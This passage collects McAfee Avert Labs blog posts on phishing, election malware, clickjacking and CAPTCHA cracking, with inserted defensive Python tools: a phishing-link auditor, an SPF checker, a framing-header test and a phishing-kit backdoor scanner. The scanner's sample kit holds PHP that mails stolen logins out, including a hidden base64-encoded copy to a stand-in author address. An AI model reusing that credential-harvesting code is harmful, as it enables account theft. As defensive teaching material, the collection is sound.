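    '<p>Contact us at <a href="https://www.examplebank.example/">our website</a>.</p>'
)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in the message."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; schemeless strings such as 'www.x.example/y' are accepted."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def is_trusted(host):
    """True only for the institution's domain or a subdomain of it."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def audit_email(html):
    """Return a list of (finding, shown_text, href) tuples."""
    findings = []
    collector = AnchorCollector()
    collector.feed(html)
    for href, text in collector.anchors:
        href_host = host_of(href)
        # Visible text is itself a URL, but its host is not where the link goes.
        if URL_LIKE.fullmatch(text) and host_of(text) != href_host:
            findings.append(("display-mismatch", text, href))
        if not is_trusted(href_host):
            findings.append(("untrusted-host", text, href))
    # Non-clickable URLs in the text, the "copy and paste this link" habit.
    text_only = re.sub(r"<[^>]+>", " ", html)
    for match in URL_LIKE.finditer(text_only):
        token = match.group(0)
        if not is_trusted(host_of(token)):
            findings.append(("untrusted-text-url", token, None))
    return findings


if __name__ == "__main__":
    for finding in audit_email(SAMPLE_EMAIL):
        print(finding)
```

The suffix test in is_trusted is deliberate: “examplebank.example.account-check.example” starts with the bank’s name but does not end with its domain, which is exactly the kind of look-alike that a customer reading the URL in their address bar is supposed to catch.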


Multiple Sign-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.


Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.


Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.


Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.


In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that does little to make them more resilient. None of these techniques will necessarily have any effect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mock-up site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.
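SPF is one of the countermeasures referred to here: a domain publishes which IP ranges may send mail on its behalf, and a receiving server compares the connecting address against that list. The following is an added example, not code from the original post or from any McAfee tool: a minimal offline SPF evaluator plus a small survey of how strict each published policy is. The records and domains are constructed; include:, a, mx and redirect= terms need DNS and are deliberately not resolved.

```python
# Added example (not from the original post): a minimal, offline SPF
# evaluator showing what the "simple, free" anti-forgery check does with a
# sender's IP. It handles v=spf1, ip4:/ip6: mechanisms with qualifiers and
# the terminal "all"; include:, a, mx and redirect= need DNS and are
# deliberately skipped. Records below are constructed.
import ipaddress

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed TXT records for three hypothetical sending domains.
RECORDS = {
    "strict.example": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all",
    "soft.example": "v=spf1 ip4:198.51.100.0/24 ~all",
    "nopolicy.example": None,  # no SPF record published at all
}


def spf_check(record, sender_ip):
    """Evaluate an SPF record for sender_ip.

    Returns one of 'none', 'pass', 'fail', 'softfail', 'neutral', following
    the RFC 7208 rule that a record with no matching mechanism is neutral.
    """
    if not record or not record.lower().startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        mechanism, _, value = term.partition(":")
        mechanism = mechanism.lower()
        if mechanism == "all":
            return QUALIFIER_RESULT[qualifier]
        if mechanism in ("ip4", "ip6"):
            try:
                # an address of the other family simply does not match
                if ip in ipaddress.ip_network(value, strict=False):
                    return QUALIFIER_RESULT[qualifier]
            except ValueError:
                continue  # malformed network: ignore the term
        # include:/a/mx/redirect= would require DNS lookups (not done offline)
    return "neutral"


def policy_strength(record):
    """Classify how much a published record actually protects the domain."""
    if not record:
        return "unprotected"
    terminal = record.split()[-1].lower()
    if terminal == "-all":
        return "strict"
    if terminal == "~all":
        return "soft"
    return "permissive"


def survey(records):
    """Domain -> policy strength, the kind of tally the Fortune-500 study made."""
    return {domain: policy_strength(rec) for domain, rec in records.items()}


if __name__ == "__main__":
    print(spf_check(RECORDS["strict.example"], "192.0.2.25"))   # pass
    print(spf_check(RECORDS["strict.example"], "203.0.113.9"))  # fail
    print(survey(RECORDS))
```

A “-all” record lets the receiver reject a forged message outright; “~all” only marks it, and a missing record gives the receiver nothing to act on, which is the state the study found at more than half of the companies surveyed.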

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

McAfee Releases Virtual Criminology Report, Edition 4

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific bank going under hits, scams and malware using that messaging emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election: malware carrying President-Elect Barack Obama messaging emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Secure Computing Links With McAfee Avert Labs

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert Labs

Where did all the spam go?

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visible and media-friendly part; please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it, and I wanted to dig out something meaningful for our readers, so I contacted a close partner of ours and got some real mail server stats.

Cropped Graph

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though ;)

This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

Survey style Phish targets JPMorgan Chase & Co.

Look what we ran across in our spam traps recently:

Phish email

$50 for a survey! It’s our unlucky day…

survey

As you can see from the partially obscured email address it is clearly NOT from JP Morgan Chase!! I hope this variation on the theme is suspicious enough to set off most people’s “too-good-to-be-true” radar. We can expect this type of attack to get much more convincing real soon, no doubt.

2008 Presidential Malware review

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both campaigns were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the malware authors specifically targeted him instead of John McCain as a means of luring users into clicking on the malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe. The email contained the subject “Obama bribes countrymen to win votes”; if the user followed the link it would download Get_Flash_updates.exe, which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe, which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World].

Finally, today we also received a new one named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrow’s DAT release.

We expect to see several more malicious files using the US Presidential election as a means of social engineering in order to trick users into executing them. So please be on the lookout and keep your security software up to date.

Election Day Is Over, but Election Malware Stays on the Campaign Trail

So, election day is over and the United States has a new president-elect. For malware writers, however, the election is not over yet! Here at Avert Labs we are still seeing seasonal election malware. An interesting one just arrived: It is called BarackObama.exe of all things. What’s more, it has an American flag icon! How patriotic is that? :)

It turns out this BarackObama.exe is actually the familiar PWS-Banker Trojan, which steals passwords and other user data about bank accounts and sends the information to the malware writer. Another interesting point is that the bank target is not an American bank, but a bank in Peru.

So, it doesn’t matter if you are a Democrat or Republican, the American election remains a nonpartisan opportunity for malware writers to get into your computer–using Barack Obama, John McCain, or even Ralph Nader. :)

Three cheers for ICANN!

… One small step for ICANN …

I never thought I’d see the day!

ICANN has found its dentures down the back of the sofa and taken a bite out of the criminals’ domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains’ problem “customers”?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign Etc…). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

So here is my top 5 for today:

#1 Moniker - Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
#2 XIN NET - This is where the Pill spammers moved to and have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic - Same as above but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online - (Surprised to see them so high) Home of the unique URL “snowshoe” spammers - almost legit? The real world doesn’t care for their bulk and whois-protected domains (via Directi’s Logicboxes), or fake contacts.
#5 Dynamic Dolphin - Owned by Scott Richter’s Media Breakaway, formerly the bankrupted OptinRealBig. MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus - *.directNIC [Mikko's open letter]

This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but nevertheless (so I’m told) this is quick for ICANN ;)

Hip Hip…

French President a Victim of Identity Theft

I am in Las Vegas for the McAfee Focus ’08 conference, and I just heard that French President Nicolas Sarkozy suffered, in September, a case of online bank fraud on one of his personal accounts.

Authorities said the hackers were not aware of the identity of the account’s owner. We know only that they removed small amounts of money (an anonymous, well-informed source told Agence France-Presse it was for opening mobile phone accounts). Perhaps by taking small amounts the crooks wished to confirm the validity of the stolen information and to verify that the victim wasn’t paying attention. But they couldn’t have picked a worse target. The entire French police force is chasing them.

It is difficult to imagine my president as a victim of phishing, but anybody can be attacked by crimeware while browsing the Internet on a poorly protected computer. Remember, it is not necessary to visit inappropriate web sites to catch malware. In December 2007, for example, I explained in this blog that the site of the French embassy in Libya was affected by an IFRAME injection.

The most probable origin of Sarkozy’s identity theft is “carding.” As I wrote in May, lists of dump tracks are for sale by the thousands, and many hacked credit card readers are on the market. Perhaps one of them captured Sarkozy’s credit card during one of his numerous foreign travels.

Relating to this fraud, Luc Chatel, secretary of state for consumer affairs, said there has been a 9 percent increase in Internet banking crimes this year in France.

Clickjacking

[This entry was updated on November 3.]

Lately, the topic of “clickjacking” has gained popularity in discussions on the Internet. It is a new type of web attack. I decided to find out what it’s all about.

I found an online video from OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman and Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits – ClickJacking.” I also found a demo of this attack here.

In the videos they describe only parts of the vulnerability, but we can learn enough to gain a basic idea of what clickjacking is.

To explain, I’ll use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set higher than other elements of page A via cross-site scripting. The area of B also needs to be big enough that the user can easily click its content. The attacker places a button in B that leads to any action he wants. Then the attacker places some buttons on page A that will attract users. The location of the buttons in B must match the buttons in A, so when users appear to click a button on page A, they are actually clicking the button in B, because the z-index of B’s buttons is higher than that of A’s buttons. This attack uses DHTML and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich-media Internet application today. Adobe has released a security advisory and provided a workaround.
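The overlay described above only works if the target site lets itself be loaded inside a third party’s IFRAME. The defence that browsers later adopted is a response header on the framed site, X-Frame-Options and then the CSP frame-ancestors directive, which is independent of whether the attacker’s page uses JavaScript. The following is an added example, not code from the original post or from the researchers named in it: given a page’s response headers, it decides whether an arbitrary origin could frame it. Origins and headers are constructed, and CSP source matching is simplified to exact origin strings plus 'self', 'none' and '*'.

```python
# Added example (not from the original post): decide whether a browser that
# honours X-Frame-Options or CSP frame-ancestors would let one origin frame
# another. These response headers are the mitigation sites later adopted
# against the transparent-IFRAME overlay described in the post; origins and
# headers here are constructed. Source matching is simplified to exact
# origin strings plus 'self', 'none' and '*'.


def framing_policy(headers, page_origin, framer_origin):
    """Return (allowed, reason) for framer_origin embedding page_origin.

    CSP frame-ancestors, when present, takes precedence over X-Frame-Options.
    A page that sets neither can be framed by anyone, which is what the
    clickjacking overlay depends on.
    """
    lowered = {name.lower(): value for name, value in headers.items()}

    csp = lowered.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if not parts or parts[0].lower() != "frame-ancestors":
            continue
        sources = {s.strip("'").lower() for s in parts[1:]}
        if "none" in sources:
            return False, "CSP frame-ancestors 'none'"
        if "*" in sources or framer_origin.lower() in sources:
            return True, "CSP frame-ancestors lists the framer"
        if "self" in sources and framer_origin.lower() == page_origin.lower():
            return True, "CSP frame-ancestors 'self' (same origin)"
        return False, "CSP frame-ancestors does not list the framer"

    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "X-Frame-Options DENY"
    if xfo == "SAMEORIGIN":
        same = framer_origin.lower() == page_origin.lower()
        return same, "X-Frame-Options SAMEORIGIN"
    return True, "no framing restriction: page can be overlaid"


def is_clickjackable(headers, page_origin, framer_origin="http://attacker.example"):
    """Convenience wrapper: can an unrelated third-party origin frame this page?"""
    return framing_policy(headers, page_origin, framer_origin)[0]


if __name__ == "__main__":
    bank = "https://bank.example"  # constructed origin
    print(is_clickjackable({}, bank))                                   # True
    print(is_clickjackable({"X-Frame-Options": "DENY"}, bank))         # False
    print(is_clickjackable({"Content-Security-Policy": "frame-ancestors 'self'"}, bank))  # False
```

Running a check like this over a site’s login and transaction pages tells you which of them an attacker’s page A could load as its invisible IFRAME B.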

We will continue to watch for new information about this vulnerability.

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Cracking CAPTCHA: Another Russian Business

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have sought to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer their services, and the competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundreds of thousands of CAPTCHAs. Rates vary from $8 to $1 per 1,000 CAPTCHAs.

A less expensive solution consists of using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands of CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of their OCR algorithms. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes that it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHAs. We read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) requested registration, it received a CAPTCHA and immediately forwarded the image to a central server that attempted to decode it and returned the result. The decoding succeeded only around 35 percent of the time, VB said, but a new idea had been launched. The fact that large numbers of infected systems were making repeated attempts suggests a high number of new spamming accounts were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood forums, guestbooks, blogs, wikis, etc. with messages and links. It automatically finds and fills in the required fields without a browser. If the forum requires registration, the program registers, logs in, and posts the spammer’s text. XRumer gets past JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 works on most recent versions of popular forum engines such as vBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum: “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat” CAPTCHAs shown in the picture below.

On October 3, XRumer’s maker explained that he had analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them simply by their sizes in bytes. And he concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches lead me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same one that offered an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed Reuters that he could not be accused of identity theft with the CyberLover concept. He explained: “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he sells XRumer, I suggest he repeat the CAPTCHA Killer web site’s argument: to help the million people suffering from blindness.

Loss Leaders in Phishing

Q: How do you build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

scam site

I suspect that this is a shareware-style, lead-generation setup, as the phishing kits appear to be of relatively poor quality. (So poor, in fact, that I expect the most experienced brands to be sending takedown notices for them before the phishing emails are actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too; I guess they gotta pay the hosting bill somehow!
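The usual way a “free” kit pays its author is a second recipient hidden inside an encoded blob, so that every stolen credential the buyer collects is also mailed to whoever wrote the kit. The block below is an added example for this page, not code from the post or from any of the kits listed: the kit files are constructed, and the heuristic (decode every long base64 run, then look inside for e-mail addresses and mail()/eval() calls) is an assumption about how such backdoors are typically hidden rather than a description of what these particular kits contained.

```python
"""Find hidden drop addresses in a phishing kit.

Added example, not the post's code. Kit files are constructed; the
decode-and-grep heuristic is an assumption about typical kit backdoors.
"""
import base64
import binascii
import re
import string
from typing import Dict, List, Set

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-alphabet run
PRINTABLE = set(string.printable)


def decode_layers(text: str, max_depth: int = 3) -> List[str]:
    """Decode every base64 blob in text, then recurse into what came out."""
    found: List[str] = []
    frontier = [text]
    for _ in range(max_depth):
        nxt: List[str] = []
        for chunk in frontier:
            for m in BLOB_RE.finditer(chunk):
                try:
                    raw = base64.b64decode(m.group(0), validate=True)
                    decoded = raw.decode("ascii")
                except (binascii.Error, ValueError, UnicodeDecodeError):
                    continue
                if set(decoded) <= PRINTABLE:   # skip binary junk
                    found.append(decoded)
                    nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return found


def scan_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Separate addresses visible in clear text from those only in decoded blobs."""
    overt: Set[str] = set()
    hidden: Set[str] = set()
    flagged: Set[str] = set()
    for name, body in files.items():
        overt.update(EMAIL_RE.findall(body))
        for layer in decode_layers(body):
            addrs = set(EMAIL_RE.findall(layer))
            if addrs or "mail(" in layer or "eval(" in layer:
                flagged.add(name)
            hidden.update(addrs)
    hidden -= overt
    return {
        "overt": sorted(overt),
        "hidden": sorted(hidden),
        "flagged_files": sorted(flagged),
    }


# Constructed kit: the buyer edits $to, the author gets a copy via the blob.
_HIDDEN_CALL = 'mail("kitauthor@example.org", "copy", $msg);'
_BLOB = base64.b64encode(_HIDDEN_CALL.encode()).decode()
SAMPLE_KIT: Dict[str, str] = {
    "index.html": '<form action="login.php" method="post">...</form>',
    "login.php": "\n".join([
        "<?php",
        '$to = "collector@example.net";   // address the kit buyer is told to edit',
        '$msg = "user=" . $_POST["user"] . "&pass=" . $_POST["pass"];',
        'mail($to, "Fresh login", $msg);',
        'eval(base64_decode("' + _BLOB + '"));',
        'header("Location: https://www.example.com/");',
    ]),
}

if __name__ == "__main__":
    print(scan_kit(SAMPLE_KIT))
```

Any address that shows up only after decoding is a recipient the buyer was never meant to see. Real kits often stack several encodings (base64 inside gzinflate, str_rot13, and so on), which is why the decoder recurses; extending it means adding those transforms to the inner loop, never executing the PHP.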

Kudos to the host in Germany for taking down the site next day; you know who you are. ;)

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: all roads of further investigation lead back to France. The details have been with the national police for some time now (hence the delay in posting).

Why Your Laptop Is Definitely Lost

Laptop and notebook theft is a major problem; it accounts for between 3 and 7 percent of reported thefts, according to experts. In 2006, a company making computer-tracking products estimated that 750,000 pieces of equipment a year were being stolen.

Another tracking firm said FBI statistics show two million laptop and notebook computers were stolen in the United States in a recent year. And 50 percent of the 403 senior managers surveyed in the Computer Security Institute’s 2007 Computer Crime and Security Survey said their organization had experienced laptop or mobile-device theft within the previous 12 months.

